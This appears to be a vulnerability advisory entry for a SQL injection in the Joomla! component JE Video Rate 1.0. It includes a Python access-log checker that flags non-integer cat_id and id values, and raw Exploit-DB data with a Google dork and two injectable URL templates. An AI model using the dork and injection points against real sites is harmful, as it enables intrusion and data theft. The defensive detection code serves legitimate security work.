Vendor: JE Video Rate
By: Ihsan Sencan
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: JE Video Rate
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:joomlaextension.biz:jevideorate:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
Year: 2017

Joomla! Component JE Video Rate 1.0 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component JE Video Rate 1.0. An attacker can send malicious SQL queries to the application, allowing them to bypass authentication and gain unauthorized access to data. The vulnerability is due to insufficient input validation when the application handles user-supplied data in the cat_id (view=video) and id (view=video_detail) request parameters.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.
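
Since no patch exists for version 1.0, the same validation can be applied in front of the component or over its access logs. The following is an added example, not code from the advisory or from the component: it flags requests to com_jevideorate whose cat_id or id value is not a plain integer. It assumes both identifiers are decimal integers in legitimate use; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter to check for each affected view, taken from the two URLs in the advisory.
AFFECTED = {"video": "cat_id", "video_detail": "id"}
# Assumption: both identifiers are plain decimal integers in legitimate use.
INT_RE = re.compile(r"[0-9]{1,10}")
# Request line inside a combined-format access log entry.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def check_url(url):
    """Return None if the request passes, else a short reason string."""
    query = parse_qs(urlsplit(url).query)  # percent-decodes the values
    if query.get("option", [""])[-1] != "com_jevideorate":
        return None  # a different component: out of scope for this check
    param = AFFECTED.get(query.get("view", [""])[-1])
    if param is None:
        return None  # view not listed in the advisory
    # Check every occurrence so a duplicated parameter cannot hide a bad value.
    for value in query.get(param, []):
        if not INT_RE.fullmatch(value):
            return f"non-integer {param}={value!r}"
    return None


def scan_log(lines):
    """Yield (line_number, reason) for each log line that fails the check."""
    for number, line in enumerate(lines, start=1):
        match = REQ_RE.search(line)
        if match:
            reason = check_url(match.group(1))
            if reason:
                yield number, reason


# Constructed sample log lines (documentation IP range, not from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Feb/2017:10:00:01 +0000] "GET /index.php?option=com_jevideorate&view=video&cat_id=3 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [13/Feb/2017:10:00:05 +0000] "GET /index.php?option=com_jevideorate&view=video_detail&id=12%27 HTTP/1.1" 500 310',
    '198.51.100.7 - - [13/Feb/2017:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=5:title HTTP/1.1" 200 7421',
    '198.51.100.9 - - [13/Feb/2017:10:00:12 +0000] "GET /index.php?option=com_jevideorate&view=video&cat_id=3&cat_id=x HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, reason in scan_log(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

The check only sees query strings recorded in the access log, so values sent in POST bodies or through rewritten (SEF) URLs need the same test applied at the proxy or in the application itself.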

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component JE Video Rate 1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_jevideorate
# Date: 13.02.2017
# Vendor Homepage: http://www.joomlaextension.biz/
# Software Buy: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/je-video-rate/
# Demo: http://www.joomlaextension.biz/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video&cat_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jevideorate&view=video_detail&id=[SQL]
# # # # #